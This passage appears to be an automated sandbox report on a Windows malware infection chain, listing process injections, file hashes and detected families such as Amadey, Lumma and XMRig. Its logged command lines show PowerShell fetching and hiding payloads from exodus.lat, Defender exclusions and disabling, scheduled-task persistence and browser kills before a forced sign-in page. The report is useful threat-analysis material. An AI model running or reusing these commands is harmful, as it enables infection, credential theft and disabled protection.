Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1520 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2876 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 3020 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp
PID 2460 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2460 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2460 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 2460 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 832 wrote to memory of 1976 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2876 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 1516 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1732 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1732 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe

"C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9K4OL.tmp\i1A5m12.tmp" /SL5="$F0154,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause raf_encoder_1252

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause raf_encoder_1252

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe

"C:\Users\Admin\AppData\Local\Temp\1012579001\d3b8f2d358.exe"

C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe

"C:\Users\Admin\AppData\Local\Temp\1012580001\d902cee6ea.exe"

C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe

"C:\Users\Admin\AppData\Local\Temp\1012581001\7329de9159.exe"

C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe

"C:\Users\Admin\AppData\Local\Temp\1012582001\a01c94d9d9.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.0.346891089\914119585" -parentBuildID 20221007134813 -prefsHandle 1160 -prefMapHandle 1152 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {556db0af-af43-4032-8f69-8c2bf39c93dc} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 1236 fdd4b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.1.17016970\2111263013" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97079259-12da-431d-8855-9c8d2e1cdc60} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 1512 ebec458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.2.701283415\8026146" -childID 1 -isForBrowser -prefsHandle 1828 -prefMapHandle 1824 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6713a323-2273-4011-a375-5297a28f1bc0} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 1852 18354358 tab

C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe

"C:\Users\Admin\AppData\Local\Temp\1012583001\8785c75487.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.3.1202726128\22330463" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f480303-384f-4fa4-aaf8-c56307d20e3c} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 2912 1d26aa58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.4.1299394667\2076945187" -childID 3 -isForBrowser -prefsHandle 3700 -prefMapHandle 3692 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ffb5211-9e15-4e35-9483-504510607415} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 3708 1f45fa58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.5.631718763\1001044201" -childID 4 -isForBrowser -prefsHandle 3828 -prefMapHandle 3832 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e891a749-537a-427a-9254-2230791ba30e} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 3816 1f820b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1048.6.851267058\491853832" -childID 5 -isForBrowser -prefsHandle 3992 -prefMapHandle 3996 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 588 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0cd22b16-c5ab-462b-b8a8-0a3af2845bab} 1048 "\\.\pipe\gecko-crash-server-pipe.1048" 3980 1f821758 tab

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\tasklist.exe

tasklist /fi "imagename eq mi.exe"

C:\Windows\SysWOW64\find.exe

find /i "mi.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

Network


Files

SHA256 8d8dbaeba7b4b3ad084c6b04d3462aee354b8831a69a3cee1a7c9093c0bd2cbc
SHA512 e1b653f5d106a5bdd44480aa5b6a4ffa6a5aefbb1d96cefc59284396a5a6ef0086c03c7dbd640dc17573335186459112a873226ac18a771a90b550afed4c798f

memory/1260-882-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-884-0x0000000000250000-0x0000000000715000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b485d38393f9a81a301b449de5a18572
SHA1 c30a91d549c45bdca336af128bffe8a2446d3306
SHA256 97e169acb2588cb5f43005a326f1b60a27d8745bab2ad5364db484fd767ef3e4
SHA512 99000d29eabbdc898e0be4c718acb9284e7ed3c605b1331bb66104b091ec661a410a5a7ef5536dc73bfe5917b25e28d6961c746375e69aba393f8bccac058748

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 7b1434f5ef9f54f8faec169cdf97fc30
SHA1 43b9484471778aca32df678505f4437d8239a663
SHA256 a61ae9e623f7b243e3868d090f2e994f75392a2315523f21ace2d35de982413f
SHA512 f551e50825f779814e7e0475943781d18a830d4ca8bda659f5fbbce4203d00076c4bf2976a505b4a3d47adf0083c3e8765246dd9b825c535f9dc899c6025c107

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

memory/3660-937-0x0000000001080000-0x00000000010AE000-memory.dmp

memory/576-954-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 486d13a0e7ac39122e1525ffe19f3b8f
SHA1 9400c10ae11b0fe96773ddf56a0fbf0d36850e10
SHA256 e77c6d41e2f3886c040bbd02eee12b4d3ecd7f51a4aad0634feda0be03598c49
SHA512 13367912713eea63ccb23040c92b990714d7acb8897d8547e3a1bfbe9f9bc8344c75abd168e458f35e293d20d9a80cd2e18c717e9f17d86b92137ead96ed6664

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 37b999203e40621bf969a40e7615bd93
SHA1 a4e566ea3fa1ae61917f8a90694affbeabcd499b
SHA256 40349227b8bf7e810faace7d8a4013d5e6104ca919ac1dfe36625d49767faf11
SHA512 205744f89a049d0b86580e906b94587630812e5a19fd495c727462f9fc965425e56469c552fa745af4a12493fae504d4891f38ab0eb9cbbb50f517173b1caf33

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 02:29

Reported

2024-12-06 02:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5064 created 3412 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

TA505

ta505

Ta505 family

ta505

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
